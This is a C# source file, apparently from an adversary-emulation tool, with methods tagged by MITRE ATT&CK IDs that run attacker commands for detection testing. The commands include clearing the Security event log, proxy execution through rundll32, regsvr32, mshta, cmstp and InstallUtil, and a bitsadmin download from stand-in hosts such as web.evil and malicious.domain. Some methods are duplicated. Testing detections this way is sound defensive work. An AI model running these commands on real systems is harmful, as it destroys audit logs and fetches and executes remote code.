static public void WindowsCommandShell(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1059.003");
try
{
ExecutionHelper.StartProcessApi("", "cmd.exe /C whoami", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
static public void SystemNetworkConfigurationDiscovery(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1016");
try
{
ExecutionHelper.StartProcess("", "ipconfig /all", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
static public void FileAndDirectoryDiscovery(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1083");
try
{
ExecutionHelper.StartProcess("", @"dir c:\ >> %temp%\download", logger);
ExecutionHelper.StartProcess("", @"dir C:\Users\ >> %temp%\download", logger, true);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void Rundll32(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1218.011");
try
{
string file = @"C:\Windows\twain_64.dll";
ExecutionHelper.StartProcess("", String.Format("rundll32 \"{0}\"", file), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void ClearSecurityEventLogCmd(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1070.001");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
ExecutionHelper.StartProcess("", "wevtutil.exe cl Security", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void InstallUtil(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1218.004");
try
{
string file = @"C:\Windows\Temp\XKNqbpzl.exe";
ExecutionHelper.StartProcess("", String.Format(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfiles /LogToConsole=alse /U {0}", file), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void SystemUserDiscovery(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1033");
try
{
ExecutionHelper.StartProcess("", "whoami", logger);
ExecutionHelper.StartProcess("", "query user", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void Mshta(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1218.005");
try
{
string url = "http://webserver/payload.hta";
ExecutionHelper.StartProcess("", String.Format("mshta {0}", url), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void NetworkShareEnumerationCmdLocal(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Logger logger = new Logger(currentPath + log);
logger.SimulationHeader("T1135");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
ExecutionHelper.StartProcessApi("", "net share", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
static public void ExecutePowershell(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1086");
try
{
string encodedPwd = "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==";
ExecutionHelper.StartProcess("", String.Format("powershell.exe -enc {0}", encodedPwd), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
static public void ExecuteWmiCmd(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1047");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
ExecutionHelper.StartProcessNET("wmic.exe", String.Format(@"process call create ""powershell.exe"""), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void XlScriptProcessing(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1220");
try
{
string url = "http://webserver/payload.xsl";
ExecutionHelper.StartProcess("", String.Format("wmic os get /FORMAT:\"{0}\"", url), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void Csmtp(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1218.003");
try
{
string file = @"C:\Users\Administrator\AppData\Local\Temp\XKNqbpzl.txt";
ExecutionHelper.StartProcess("", String.Format("cmstp /s /ns {0}", file), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void SystemServiceDiscovery(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1007");
try
{
ExecutionHelper.StartProcess("", "net start", logger);
ExecutionHelper.StartProcess("", "tasklist /svc", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
static public void ServiceExecution(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1569.002");
try
{
ExecutionHelper.StartProcessApi("", "net start UpdaterService", logger);
ExecutionHelper.StartProcessApi("", "sc start UpdaterService", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void RemoteSystemDiscoveryCmd(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Logger logger = new Logger(currentPath + log);
logger.SimulationHeader("T1018");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
ExecutionHelper.StartProcessNET("cmd.exe", "/c net view", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
static public void ExecutePowershellCmd(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1059.001");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
string encodedPwd = "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==";
ExecutionHelper.StartProcessApi("", String.Format("powershell.exe -enc {0}", encodedPwd), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void ClearSecurityEventLogCmd(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1070");
//logger.TimestampInfo(String.Format("Starting T1070 Simulation on {0}", Environment.MachineName));
//logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id));
try
{
ExecutionHelper.StartProcess("", "wevtutil.exe cl Security", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void SystemNetworkConnectionsDiscovery(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1049");
try
{
ExecutionHelper.StartProcess("", "netstat", logger);
ExecutionHelper.StartProcess("", "net use", logger);
ExecutionHelper.StartProcess("", "net session", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void DeobfuscateDecode(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1140");
try
{
string encoded = "encodedb64.txt";
string decoded = "decoded.exe";
ExecutionHelper.StartProcess("", String.Format("certutil -decode {0} {1}", encoded, decoded), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void DomainAccountDiscoveryCmd(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1087.002");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
ExecutionHelper.StartProcess("", "net user /domain", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void BitsJobs(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1197");
try
{
string url = "http://web.evil/sc.exe";
string file = @"C:\Windows\Temp\winword.exe";
ExecutionHelper.StartProcess("", String.Format("bitsadmin /transfer job /download /priority high {0} {1}", url, file), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
static public void JScript(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1059.007");
try
{
string file = "invoice0420.js";
ExecutionHelper.StartProcessApi("", String.Format("wscript.exe {0}", file), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
static public void Regsvr32(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1218.010");
try
{
string url = @"http://malicious.domain:8080/payload.sct";
string dll = "scrobj.dll";
ExecutionHelper.StartProcess("", String.Format("regsvr32.exe /u /n /s /i:{0} {1}", url, dll), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void RegsvcsRegasm(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1218.009");
try
{
string file = @"winword.dll";
ExecutionHelper.StartProcess("", String.Format(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U {0}", file), logger);
ExecutionHelper.StartProcess("", String.Format(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U {0}", file), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void DomainTrustDiscoveryCmd(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Logger logger = new Logger(currentPath + log);
logger.SimulationHeader("T1482");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
ExecutionHelper.StartProcessNET("nltest.exe", "/domain_trusts", logger);
//ExecutionHelper.StartProcessApi("","nltest /domain_trusts", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void PasswordPolicyDiscovery(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1201");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
ExecutionHelper.StartProcessApi("", "net accounts", logger);
ExecutionHelper.StartProcessApi("", "net accounts /domain", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void SystemUserDiscovery(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1033");
//logger.TimestampInfo(String.Format("Starting T1033 Simulation on {0}", Environment.MachineName));
//logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id));
try
{
ExecutionHelper.StartProcess("", "whoami", logger);
ExecutionHelper.StartProcess("", "query user", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void LocalGroups(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1069.001");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
ExecutionHelper.StartProcess("", "net localgroup", logger);
ExecutionHelper.StartProcess("", "net localgroup \"Administrators\"", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void SystemTimeDiscovery(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1124");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
ExecutionHelper.StartProcess("", "w32tm /tz", logger);
ExecutionHelper.StartProcess("", "time /T", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
